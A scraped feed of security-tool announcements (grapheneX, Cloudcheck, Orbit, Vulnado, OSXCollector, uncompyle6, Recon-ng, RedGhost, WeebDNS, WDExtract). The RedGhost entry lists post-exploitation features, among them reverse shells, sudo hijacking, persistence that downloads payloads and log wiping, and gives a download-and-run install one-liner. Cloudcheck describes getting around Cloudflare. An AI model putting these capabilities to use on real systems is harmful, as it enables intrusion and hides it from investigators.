Hardening commands and the scopes of those commands are referred to modules and the namespaces in the project. They exist at the modules.json file after installation. ($PYPATH/site-packages/graphenex/modules.json) Additionally, it's possible to add, edit or remove modules and namespaces. Also, the hardening operation can be automated with the presets that contain a list of modules.
Currently, grapheneX support the hardening sections below. Each of these namespaces contains more than one module.

  • Firewall
  • User
  • Network
  • Services
  • Kernel
  • Filesystem
  • Other


Installation
You can install grapheneX with pip. Usually this is the easiest way:
pip install graphenex
Also it's possible to run the setup.py for installation as follows:
python setup.py install 
The commands below can be used for testing the project without installation:
cd grapheneX
pipenv install
pipenv run python -m graphenex

Dependencies

Usage

Command Line Arguments
usage: grapheneX [-h] [-v] [-w] [--open] [host:port]
positional arguments:
host:port host and port to run the web interface

optional arguments:
-h, --help show this help message and exit
-v, --version show version information
-w, --web run the grapheneX web server
--open open browser on web server start

Interactive Shell
Execute the grapheneX.py in order to start the interactive shell.


  • Animated gifs and screenshots added for demonstration and include the test execution of the unversioned grapheneX. Use grapheneX or python -m graphenex command for the execution.
  • grapheneX currently supports Python3.7
  • Project's some functions (such as hardening) might not work without root access. So consider running the grapheneX with sudo/administrative access.


Web Interface
Execute the grapheneX.py with the -w or --web argument in order to start the web server.





  • The default host and port value are 0.0.0.0:8080. It can be changed via the host:port argument as shown below.

python grapheneX.py -w 192.168.1.36:8090

  • Use --open argument to open the browser after the server start.

python grapheneX.py -w --open

CLI Commands
CommandDescription
backGo back from namespace or module
clearClear the terminal
exitExit interactive shell
hardenExecute the hardening command
helpList available commands with "help" or show detailed help with "help <cmd>"
infoShow information about the module
listList available hardening modules
manageAdd, edit or delete module
presetShow/execute the hardening module presets
searchSearch for modules
switchSwitch between modules or namespaces
useUse a hardening module
webStart the grapheneX web server

help
help or ? shows the commands list above.
help [CMD] shows the detailed usage of given command.

list
Show the available modules in a table. For example:



switch
switch command can be used to switch to a namespace or use a module. It's helpful if you want to see a list of modules in a namespace.
switch [NAMESPACE]



  • Supports autocomplete for namespaces.

Also, using the switch command like this is possible:
switch [NAMESPACE]/[MODULE]
It's the equivalent of the use command in this situation.

use
Serves the purpose of selecting a hardening module.
use [MODULE]


  • Supports autocomplete for modules.


info
Shows information (namespace, description, OS command) about the selected module.


harden
Executes the hardening command of the selected module.


preset
grapheneX has presets that contain particular modules for automating the hardening operation. Presets can be customized with the modules.json file and they can contain any supported module. preset command shows the available module presets and preset [PRESET] runs the hardening commands in a preset.


An example preset command output is shown above. Below, a preset that contains 2 modules is selected and hardening modules executed.


preset command supports autocomplete for preset names. Also, it supports an option for asking permission between each hardening command execution so that the user knows what he/she is doing.

  • Adding module presets

Presets are stored in the presets element inside the modules.json file. This JSON file can be edited for updating the presets.
"presets": [
{
"name": "Preset_1",
"modules": [
"namespace1/Module_Name1",
"namespace2/Module_Name2",
],
"target_os": "linux/win"
},
{
"name": "Preset_2",
"modules": [
"namespace/All"
],
"target_os": "linux/win"
}
]
namespace/All means every hardening command in that namespace will be executed.

search
search [QUERY]


manage
manage command allows to add, edit or remove modules.

  • Adding modules with manage

Follow the instructions for adding a new module. Choose the 'new' option in the namespace prompt for creating a new namespace.


  • Adding modules manually

grapheneX stores the modules and namespaces in modules.json file. It will show up as a new module when a new element is created in this JSON file. An example element is given below.
"namespace": [
{
"name": "Module_Name",
"desc": "This is the module description.",
"command": "echo 'hardening command'",
"require_superuser": "True/False",
"target_os": "linux/win"
}
]
It's recommended to add modules from CLI or the Web interface other than editing the modules.json file.

  • Editing modules

Choose the edit option after the manage command for the editing the module properties.


Or edit the modules.json manually.

  • Removing modules

Choosing the remove option in the manage menu will be enough for removing the specified module. It's also possible to remove the module from modules.json manually.


web
Starts the grapheneX web server with the optional host:port argument.
web [host:port]


back
Go back from selected namespace or module.

clear
Clear terminal

exit
Exit interactive shell

Web
Most of the command line features are accessible with the Web interface.

Namespaces & Modules
It's easy to switch between namespaces and see details of modules.


Hardening
Just click run under the module properties for executing the hardening command.


Adding Modules
There's a menu available in the web interface for adding new modules.


Screenshots






TODO(s)
  • Add new modules for Linux and Windows.



Cloudcheck - Checks Using A Test String If A Cloudflare DNS Bypass Is Possible Using CloudFail

$
0
0

Cloudcheck is made to be used in the same folder as CloudFail. Make sure all files in this repo are in the same folder before using.
Also create a empty text file called none.txt in the data folder, that way it doesn't do a subdomain brute when testing.

Cloudcheck will automatically change your hosts file, using entries from CloudFail and test for a specified string to detect if said entry can be used to bypass Cloudflare.
If output comes out to be "True", you can use the IP address to bypass Cloudflare in your hosts file. 


Orbit v2.0 - Blockchain Transactions Investigation Tool

$
0
0

Introduction
Orbit is designed to explore network of a blockchain wallet by recursively crawling through transaction history. The data is rendered as a graph to reveal major sources, sinks and suspicious connections.
Note:Orbit only runs on Python 3.2 and above.

Usage
Let's start by crawling transaction history of a wallet
python3 orbit.py -s 1AJbsFZ64EpEfS5UAjAfcUG8pH8Jn3rn1F
Crawling multiple wallets is no different.
python3 orbit.py -s 1AJbsFZ64EpEfS5UAjAfcUG8pH8Jn3rn1F,1ETBbsHPvbydW7hGWXXKXZ3pxVh3VFoMaX
Orbit fetches last 50 transactions from each wallet by default, but it can be tuned with -l option.
python3 orbit.py -s 1AJbsFZ64EpEfS5UAjAfcUG8pH8Jn3rn1F -l 100
Orbit's default crawling depth is 3 i.e. it fetches the history of target wallet(s), crawls the newly found wallets and then crawls the wallets in the result again. The crawling depth can be increased or decresead with -d option.
python3 orbit.py -s 1AJbsFZ64EpEfS5UAjAfcUG8pH8Jn3rn1F -d 2
Wallets that have made just a couple of interactions with our target may not be important, Orbit can be told to crawl top N wallets at each level by using the -t option.
python3 orbit.py -s 1AJbsFZ64EpEfS5UAjAfcUG8pH8Jn3rn1F -t 20
If you want to use the collected data in some other way, you can save it to a JSON file by using the o option as follows
python3 orbit.py -s 1AJbsFZ64EpEfS5UAjAfcUG8pH8Jn3rn1F -o output.json
This is your terminal dashboard.


Visualization
Once the scan is complete, the graph will automatically open in your default browser. If it doesn't open, open quark.html manually. Don't worry if your graph looks messy like the one below or worse.


Select the Make Clusters option to form clusters using community detection algorithm. After that, you can use Color Clusters to give different colors to each community and then use Spacify option to fix overlapping nodes & edges.


The thickness of edges depends on the frequency of transactions between two wallets while the size of a node depends on both transaction frequency and the number of connections of the node.
As Orbit uses Quark to render the graph, more information about the various features and controls is available in Quark's README.


Vulnado - Purposely Vulnerable Java Application To Help Lead Secure Coding Workshops

$
0
0
This application and exercises will take you through some of the OWASP top 10 Vulnerabilities and how to prevent them.

Up and running
  1. Install Docker for MacOS or Windows. You'll need to create a Docker account if you don't already have one.
  2. git clone git://github.com/ScaleSec/vulnado
  3. cd vulnado
  4. docker-compose up
  5. Open a browser and navigate to the client to make sure it's working: http://localhost:1337
  6. Then back in your terminal verify you have connection to your API server: nc -vz localhost 8080

Architecture
The docker network created by docker-compose maps pretty well to a multi-tier architecture where a web server is publicly available and there are other network resources like a database and internal site that are not publicly available.



Exercises


OSXCollector - A Forensic Evidence Collection & Analysis Toolkit For OS X

$
0
0

OSXCollector is a forensic evidence collection & analysis toolkit for OSX.

Forensic Collection
The collection script runs on a potentially infected machine and outputs a JSON file that describes the target machine. OSXCollector gathers information from plists, SQLite databases and the local file system.

Forensic Analysis
Armed with the forensic collection, an analyst can answer the question like:
  • Is this machine infected?
  • How'd that malware get there?
  • How can I prevent and detect further infection?
Yelp automates the analysis of most OSXCollector runs converting its output into an easily readable and actionable summary of just the suspicious stuff. Check out OSXCollector Output Filters project to learn how to make the most of the automated OSXCollector output analysis.

Performing Collection
osxcollector.py is a single Python file that runs without any dependencies on a standard OSX machine. This makes it really easy to run collection on any machine - no fussing with brew, pip, config files, or environment variables. Just copy the single file onto the machine and run it:
sudo osxcollector.py is all it takes.
$ sudo osxcollector.py
Wrote 35394 lines.
Output in osxcollect-2014_12_21-08_49_39.tar.gz
If you have just cloned the GitHub repository, osxcollector.py is inside osxcollector/ directory, so you need to run it as:
$ sudo osxcollector/osxcollector.py
IMPORTANT: please make sure that python command on your Mac OS X machine uses the default Python interpreter shipped with the system and is not overridden, e.g. by the Python version installed through brew. OSXCollector relies on a couple of native Python bindings for OS X libraries, which might be not available in other Python versions than the one originally installed on your system. Alternatively, you can run osxcollector.py explicitly specifying the Python version you would like to use:
$ sudo /usr/bin/python2.7 osxcollector/osxcollector.py
The JSON output of the collector, along with some helpful files like system logs, has been bundled into a .tar.gz for hand-off to an analyst.
osxcollector.py also has a lot of useful options to change how collection works:
  • -i INCIDENT_PREFIX/--id=INCIDENT_PREFIX: Sets an identifier which is used as the prefix of the output file. The default value is osxcollect.
    $ sudo osxcollector.py -i IncontinentSealord
    Wrote 35394 lines.
    Output in IncontinentSealord-2014_12_21-08_49_39.tar.gz
    Get creative with incident names, it makes it easier to laugh through the pain.
  • -p ROOTPATH/--path=ROOTPATH: Sets the path to the root of the filesystem to run collection on. The default value is /. This is great for running collection on the image of a disk.
    $ sudo osxcollector.py -p '/mnt/powned'
  • -s SECTION/--section=SECTION: Runs only a portion of the full collection. Can be specified more than once. The full list of sections and subsections is:
    • version
    • system_info
    • kext
    • startup
      • launch_agents
      • scripting_additions
      • startup_items
      • login_items
    • applications
      • applications
      • install_history
    • quarantines
    • downloads
      • downloads
      • email_downloads
      • old_email_downloads
    • chrome
      • history
      • archived_history
      • cookies
      • login_data
      • top_sites
      • web_data
      • databases
      • local_storage
      • preferences
    • firefox
      • cookies
      • downloads
      • formhistory
      • history
      • signons
      • permissions
      • addons
      • extension
      • content_prefs
      • health_report
      • webapps_store
      • json_files
    • safari
      • downloads
      • history
      • extensions
      • databases
      • localstorage
      • extension_files
    • accounts
      • system_admins
      • system_users
      • social_accounts
      • recent_items
    • mail
    • full_hash
    $ sudo osxcollector.py -s 'startup' -s 'downloads'
  • -c/--collect-cookies: Collect cookies' value. By default OSXCollector does not dump the value of a cookie, as it may contain sensitive information (e.g. session id).
  • -l/--collect-local-storage: Collect the values stored in web browsers' local storage. By default OSXCollector does not dump the values as they may contain sensitive information.
  • -d/--debug: Enables verbose output and python breakpoints. If something is wrong with OSXCollector, try this.
    $ sudo osxcollector.py -d

Details of Collection
The collector outputs a .tar.gz containing all the collected artifacts. The archive contains a JSON file with the majority of information. Additionally, a set of useful logs from the target system logs are included.

Common Keys

Every Record
Each line of the JSON file records 1 piece of information. There are some common keys that appear in every JSON record:
  • osxcollector_incident_id: A unique ID shared by every record.
  • osxcollector_section: The section or type of data this record holds.
  • osxcollector_subsection: The subsection or more detailed descriptor of the type of data this record holds.

File Records
For records representing files there are a bunch of useful keys:
  • atime: The file accessed time.
  • ctime: The file creation time.
  • mtime: The file modified time.
  • file_path: The absolute path to the file.
  • md5: MD5 hash of the file contents.
  • sha1: SHA1 hash of the file contents.
  • sha2: SHA2 hash of the file contents.
For records representing downloaded files:
  • xattr-wherefrom: A list containing the source and referrer URLs for the downloaded file.
  • xattr-quarantines: A string describing which application downloaded the file.

SQLite Records
For records representing a row of a SQLite database:
  • osxcollector_table_name: The table name the row comes from.
  • osxcollector_db_path: The absolute path to the SQLite file.
For records that represent data associated with a specific user:
  • osxcollector_username: The name of the user

Timestamps
OSXCollector attempts to convert timestamps to human readable date/time strings in the format YYYY-mm-dd hh:MM:ss. It uses heuristics to automatically identify various timestamps:
  • seconds since epoch
  • milliseconds since epoch
  • seconds since 2001-01-01
  • seconds since 1601-01-01

Sections

version section
The current version of OSXCollector.

system_info section
Collects basic information about the system:
  • system name
  • node name
  • release
  • version
  • machine

kext section
Collects the Kernel extensions from:
  • /System/Library/Extensions
  • /Library/Extensions

startup section
Collects information about the LaunchAgents, LaunchDaemons, ScriptingAdditions, StartupItems and other login items from:
  • /System/Library/LaunchAgents
  • /System/Library/LaunchDaemons
  • /Library/LaunchAgents
  • ~/Library/LaunchAgents
  • /Library/LaunchDaemons
  • /System/Library/ScriptingAdditions
  • /Library/ScriptingAdditions
  • /System/Library/StartupItems
  • /Library/StartupItems
  • ~/Library/Preferences/com.apple.loginitems.plist
More information about the Max OS X startup can be found here: http://www.malicious-streams.com/article/Mac_OSX_Startup.pdf

applications section
Hashes installed applications and gathers install history from:
  • /Applications
  • ~/Applications
  • /Library/Receipts/InstallHistory.plist

quarantines section
Quarantines are basically the info necessary to show the 'Are you sure you wanna run this?' when a user is trying to open a file downloaded from the Internet. For some more details, checkout the Apple Support explanation of Quarantines: http://support.apple.com/kb/HT3662
This section collects also information from XProtect hash-based malware check for quarantines files. The plist is at: /System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/XProtect.plist
XProtect also add minimum versions for Internet Plugins. That plist is at: /System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/XProtect.meta.plist

downloads section
Hashes all users' downloaded files from:
  • ~/Downloads
  • ~/Library/Mail Downloads
  • ~/Library/Containers/com.apple.mail/Data/Library/Mail Downloads

chrome section
Collects following information from Google Chrome web browser:
  • History
  • Archived History
  • Cookies
  • Extensions
  • Login Data
  • Top Sites
  • Web Data
This data is extracted from ~/Library/Application Support/Google/Chrome/Default

firefox section
Collects information from the different SQLite databases in a Firefox profile:
  • Cookies
  • Downloads
  • Form History
  • History
  • Signons
  • Permissions
  • Addons
  • Extensions
  • Content Preferences
  • Health Report
  • Webapps Store
This information is extracted from ~/Library/Application Support/Firefox/Profiles
For more details about Firefox profile folder see http://kb.mozillazine.org/Profile_folder_-_Firefox

safari section
Collects information from the different plists and SQLite databases in a Safari profile:
  • Downloads
  • History
  • Extensions
  • Databases
  • Local Storage

accounts section
Collects information about users' accounts:
  • system admins: /private/var/db/dslocal/nodes/Default/groups/admin.plist
  • system users: /private/var/db/dslocal/nodes/Default/users
  • social accounts: ~/Library/Accounts/Accounts3.sqlite
  • users' recent items: ~/Library/Preferences/com.apple.recentitems.plist

mail section
Hashes files in the mail app directories:
  • ~/Library/Mail
  • ~/Library/Mail Downloads

full_hash section
Hashes all the files on disk. All of 'em. This does not run by default. It must be triggered with:
$ sudo osxcollector.py -s full_hash

Basic Manual Analysis
Forensic analysis is a bit of art and a bit of science. Every analyst will see a bit of a different story when reading the output from OSXCollector. That's part of what makes analysis fun.
Generally, collection is performed on a target machine because something is hinky: anti-virus found a file it doesn't like, deep packet inspect observed a callout, endpoint monitoring noticed a new startup item. The details of this initial alert - a file path, a timestamp, a hash, a domain, an IP, etc. - that's enough to get going.

Timestamps
Simply greping a few minutes before and after a timestamp works great:
$ cat INCIDENT32.json | grep '2014-01-01 11:3[2-8]'

Browser History
It's in there. A tool like jq can be very helpful to do some fancy output:
$ cat INCIDENT32.json | grep '2014-01-01 11:3[2-8]' | jq 'select(has("url"))|.url'

A Single User
$ cat INCIDENT32.json | jq 'select(.osxcollector_username=="ivanlei")|.'

Automated Analysis
The OSXCollector Output Filters project contains filters that process and transform the output of OSXCollector. The goal of filters is to make it easy to analyze OSXCollector output.

Development Tips
The functionality of OSXCollector is stored in a single file: osxcollector.py. The collector should run on a naked install of OS X without any additional packages or dependencies.
Ensure that all of the OSXCollector tests pass before editing the source code. You can run the tests using: make test
After making changes to the source code, run make test again to verify that your changes did not break any of the tests.

License
This work is licensed under the GNU General Public License and a derivation of https://github.com/jipegit/OSXAuditor

Blog post

Presentations

External Presentations

Resources
Want to learn more about OS X forensics?
A couple of other interesting tools:
  • KnockKnock - KnockKnock is a command line python script that displays persistent OS X binaries that are set to execute automatically at each boot.
  • Grr - Google Rapid Response: remote live forensics for incident response
  • osquery - SQL powered operating system instrumentation, monitoring, and analytics



Uncompyle6 - A Cross-Version Python Bytecode Decompiler

$
0
0

A native Python cross-version decompiler and fragment decompiler. The successor to decompyle, uncompyle, and uncompyle2.


Introduction
uncompyle6 translates Python bytecode back into equivalent Python source code. It accepts bytecodes from Python version 1.3 to version 3.8, spanning over 24 years of Python releases. We include Dropbox's Python 2.5 bytecode and some PyPy bytecode.


Why this?
Ok, I'll say it: this software is amazing. It is more than your normal hacky decompiler. Using compiler technology, the program creates a parse tree of the program from the instructions; nodes at the upper levels that look a little like what might come from a Python AST. So we can really classify and understand what's going on in sections of Python bytecode.
Building on this, another thing that makes this different from other CPython bytecode decompilers is the ability to deparse just fragments of source code and give source-code information around a given bytecode offset.
I use the tree fragments to deparse fragments of code at run time inside my trepandebuggers. For that, bytecode offsets are recorded and associated with fragments of the source code. This purpose, although compatible with the original intention, is yet a little bit different. See this for more information.
Python fragment deparsing given an instruction offset is useful in showing stack traces and can be encorporated into any program that wants to show a location in more detail than just a line number at runtime. This code can be also used when source-code information does not exist and there is just bytecode. Again, my debuggers make use of this.
There were (and still are) a number of decompyle, uncompyle, uncompyle2, uncompyle3 forks around. Almost all of them come basically from the same code base, and (almost?) all of them are no longer actively maintained. One was really good at decompiling Python 1.5-2.3 or so, another really good at Python 2.7, but that only. Another handles Python 3.2 only; another patched that and handled only 3.3. You get the idea. This code pulls all of these forks together and moves forward. There is some serious refactoring and cleanup in this code base over those old forks.
This demonstrably does the best in decompiling Python across all Python versions. And even when there is another project that only provides decompilation for subset of Python versions, we generally do demonstrably better for those as well.
How can we tell? By taking Python bytecode that comes distributed with that version of Python and decompiling these. Among those that successfully decompile, we can then make sure the resulting programs are syntactically correct by running the Python interpreter for that bytecode version. Finally, in cases where the program has a test for itself, we can run the check on the decompiled code.
We are serious about testing, and use automated processes to find bugs. In the issue trackers for other decompilers, you will find a number of bugs we've found along the way. Very few to none of them are fixed in the other decompilers.


Requirements
The code here can be run on Python versions 2.6 or later, PyPy 3-2.4, or PyPy-5.0.1. Python versions 2.4-2.7 are supported in the python-2.4 branch. The bytecode files it can read have been tested on Python bytecodes from versions 1.4, 2.1-2.7, and 3.0-3.8 and the above-mentioned PyPy versions.


Installation
This uses setup.py, so it follows the standard Python routine:
pip install -e .  # set up to run from source tree
# Or if you want to install instead
python setup.py install # may need sudo
A GNU makefile is also provided so make install (possibly as root or sudo) will do the steps above.


Running Tests
make check
A GNU makefile has been added to smooth over setting running the right command, and running tests from fastest to slowest.
If you have remake installed, you can see the list of all tasks including tests via remake --tasks


Usage
Run
$ uncompyle6 *compiled-python-file-pyc-or-pyo*
For usage help:
$ uncompyle6 -h


Verification
In older versions of Python it was possible to verify bytecode by decompiling bytecode, and then compiling using the Python interpreter for that bytecode version. Having done this the bytecode produced could be compared with the original bytecode. However as Python's code generation got better, this no longer was feasible.
If you want Python syntax verification of the correctness of the decompilation process, add the --syntax-verify option. However since Python syntax changes, you should use this option if the bytecode is the right bytecode for the Python interpreter that will be checking the syntax.
You can also cross compare the results with another python decompiler like pycdc . Since they work differently, bugs here often aren't in that, and vice versa.
There is an interesting class of these programs that is readily available give stronger verification: those programs that when run test themselves. Our test suite includes these.
And Python comes with another a set of programs like this: its test suite for the standard library. We have some code in test/stdlib to facilitate this kind of checking too.


Known Bugs/Restrictions
The biggest known and possibly fixable (but hard) problem has to do with handling control flow. (Python has probably the most diverse and screwy set of compound statements I've ever seen; there are "else" clauses on loops and try blocks that I suspect many programmers don't know about.)
All of the Python decompilers that I have looked at have problems decompiling Python's control flow. In some cases we can detect an erroneous decompilation and report that.
Python support is strongest in Python 2 for 2.7 and drops off as you get further away from that. Support is also probably pretty good for python 2.3-2.4 since a lot of the goodness of early the version of the decompiler from that era has been preserved (and Python compilation in that era was minimal)
There is some work to do on the lower end Python versions which is more difficult for us to handle since we don't have a Python interpreter for versions 1.6, and 2.0.
In the Python 3 series, Python support is is strongest around 3.4 or 3.3 and drops off as you move further away from those versions. Python 3.0 is weird in that it in some ways resembles 2.6 more than it does 3.1 or 2.7. Python 3.6 changes things drastically by using word codes rather than byte codes. As a result, the jump offset field in a jump instruction argument has been reduced. This makes the EXTENDED_ARG instructions are now more prevalent in jump instruction; previously they had been rare. Perhaps to compensate for the additional EXTENDED_ARG instructions, additional jump optimization has been added. So in sum handling control flow by ad hoc means as is currently done is worse.
Between Python 3.5, 3.6 and 3.7 there have been major changes to the MAKE_FUNCTION and CALL_FUNCTION instructions.
Currently not all Python magic numbers are supported. Specifically in some versions of Python, notably Python 3.6, the magic number has changes several times within a version.
We support only released versions, not candidate versions. Note however that the magic of a released version is usually the same as the last candidate version prior to release.
There are also customized Python interpreters, notably Dropbox, which use their own magic and encrypt bytcode. With the exception of the Dropbox's old Python 2.5 interpreter this kind of thing is not handled.
We also don't handle PJOrion obfuscated code. For that try: PJOrion Deobfuscator to unscramble the bytecode to get valid bytecode before trying this tool. This program can't decompile Microsoft Windows EXE files created by Py2EXE, although we can probably decompile the code after you extract the bytecode properly. For situations like this, you might want to consider a decompilation service like Crazy Compilers. Handling pathologically long lists of expressions or statements is slow.
There is lots to do, so please dig in and help.


See Also


Recon-ng v5.0.0 - Open Source Intelligence Gathering Tool Aimed At Reducing The Time Spent Harvesting Information From Open Sources

$
0
0

Recon-ng is a full-featured reconnaissance framework designed with the goal of providing a powerful environment to conduct open-source web-based reconnaissance quickly and thoroughly.

Recon-ng has a look and feels similar to the Metasploit Framework, reducing the learning curve for leveraging the framework. However, it is quite different. Recon-ng is not intended to compete with existing frameworks, as it is designed exclusively for web-based open source reconnaissance. If you want to exploit, use the Metasploit Framework. If you want to social engineer, use the Social-Engineer Toolkit. If you want to conduct reconnaissance, use Recon-ng! See the Wiki to get started.

Recon-ng is a completely modular framework and makes it easy for even the newest of Python developers to contribute. See the Development Guide for more information on building and maintaining modules.


RedGhost v3.0 - Linux Post Exploitation Framework Written In Bash Designed To Assist Red Teams In Persistence, Reconnaissance, Privilege Escalation And Leaving No Trace

$
0
0



Linux post exploitation framework designed to assist red teams in persistence, reconnaissance, privilege escalation and leaving no trace.

  • Payloads

Function to generate various encoded reverse shells in netcat, bash, python, php, ruby, perl
  • SudoInject
Function to inject sudo command with wrapper function to run a reverse root shell everytime "sudo" is run for privilege escalataion
  • lsInject
Function to inject the "ls" command with a wrapper function to run payload everytime "ls" is run for persistence
  • SSHKeyInject
Function to log keystrokes of a ssh process using strace
  • Crontab
Function to create cron job that downloads payload from remote server and runs payload every minute for persistence
  • SysTimer
Function to create systemd timer that downloads and executes payload every 30 seconds for persistence.
  • GetRoot
Function to try various methods to escalate privileges
  • Clearlogs
Function to clear logs and make investigation with forensics difficult
  • MassInfoGrab
Function to grab mass reconaissance/information on system
  • CheckVM
Function to check if the system is a virtual machine
  • MemoryExec
Function to execute remote bash script in memory
  • BanIp
Function to BanIp using iptables

Installation
one liner to install RedGhost:
wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; ./redghost.sh
One liner to install prerequisites and RedGhost:
wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; apt-get install dialog; apt-get install gcc; apt-get install iptables; apt-get install strace; ./redghost.sh

Prerequisites
dialog, gcc, iptables, strace


WeebDNS - DNS Enumeration With Asynchronicity

$
0
0

DNS Enumeration Tool with Asynchronicity.

Features
WeebDNS is an 'Asynchronous' DNS Enumeration Tool made with Python3 which makes it much faster than normal Tools.

PREREQUISITES
  • Python 3.x
  • pip3
  • git

PYTHON 3 PREREQUISITES
  • aiohttp
  • asyncio
  • aiodns

Installation

Resolve dependencies
Ubuntu/Debian System
$ sudo apt-get install git python3 python3-pip -y

Getting and Running WeebDNS
$ git clone https://github.com/WeebSec/weebdns.git
$ cd weebdns
$ sudo pip3 install -r requirements.txt
$ python3 weebdns.py

Bugs and enhancements
For bug reports or enhancements, please open an issue here.

This is the official and only repository of the WeebDNS project.
Written by: FuzzyRabbit - Twitter: @rabbit_fuzzy, GitHub: @FuzzyRabbit
DISCLAIMER: This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes, period.
Please read the LICENSE for the licensing of WeebDNS.


WDExtract - Extract Windows Defender Database From Vdm Files And Unpack It

$
0
0

Extract Windows Defender database from vdm files and unpack it
  • This program distributed as-is, without any warranty;
  • No official support, if you like this tool, feel free to contribute.

Features
  • Unpack VDM containers of Windows Defender/Microsoft Security Essentials;
  • Decrypt VDM container embedded in Malicious software Removal Tool (MRT.exe);
  • Extract all PE images from unpacked/decrypted containers on the fly (-e switch):
    • dump VDLLs (Virtual DLLs);
    • dump VFS (Virtual File System) contents;
    • dump signatures auxiliary images;
    • dump GAPA (Generic Application Level Protocol Analyzer) images used by NIS (Network Inspection System);
    • code can be adapted to dump type specific chunks of database (not implemented);
  • Faster than any script.
List of MRT extracted images, (version 5.71.15840.1) https://gist.githubusercontent.com/hfiref0x/e4b97fb7135c9a6f9f0787c07da0a99d/raw/d91e77f71aa96bdb98d121b1d915dc697ce85e2a/gistfile1.txt
List of WD extracted images, mpasbase.vdm (version 1.291.0.0) https://gist.githubusercontent.com/hfiref0x/38e7845304d10c284220461c86491bdf/raw/39c999e59ff2a924932fe6db811555161596b4a7/gistfile1.txt
List of NIS signatures from NisBase.vdm (version 119.0.0.0) https://gist.githubusercontent.com/hfiref0x/e9b3f185032fcd2afb31afe7bc9a05bd/raw/9bd9f9cc7c408acaff7b56b810c8597756d55d14/nis_sig.txt

Usage
wdextract file [-e]
  • file - filename of VDM container (*.vdm file or MRT.exe executable);
  • -e optional parameter, extract all found PE image chunks found in VDM after unpacking/decrypting (this including VFS components and emulator VDLLs).
Example:
  • wdextract c:\wdbase\mpasbase.vdm
  • wdextract c:\wdbase\mpasbase.vdm -e
  • wdextract c:\wdbase\mrt.exe
  • wdextract c:\wdbase\mrt.exe -e
Note: base will be unpacked/decrypted to source directory as %originalname%.extracted (e.g. if original file c:\wdbase\mpasbase.vdm, unpacked will be c:\wdbase\mpasbase.vdm.extracted). Image chunks will be dumped to created "chunks" directory in the wdextract current directory (e.g. if wdextract run from c:\wdbase it will be c:\wdbase\chunks directory). Output files always overwrite existing.

Build
  • Source code written in C;
  • Built with MSVS 2017 with Windows SDK 17763 installed;
  • Can be built with previous versions of MSVS and SDK's.

Related references and tools

N.B.
No actual dumped/extracted/unpacked binary data included or will be included in this repository.

3rd party code usage
Uses ZLIB Data Compression Library (https://github.com/madler/zlib)

Authors
(c) 2019 WDEXTRACT Project


Viewing all 5843 articles
Browse latest View live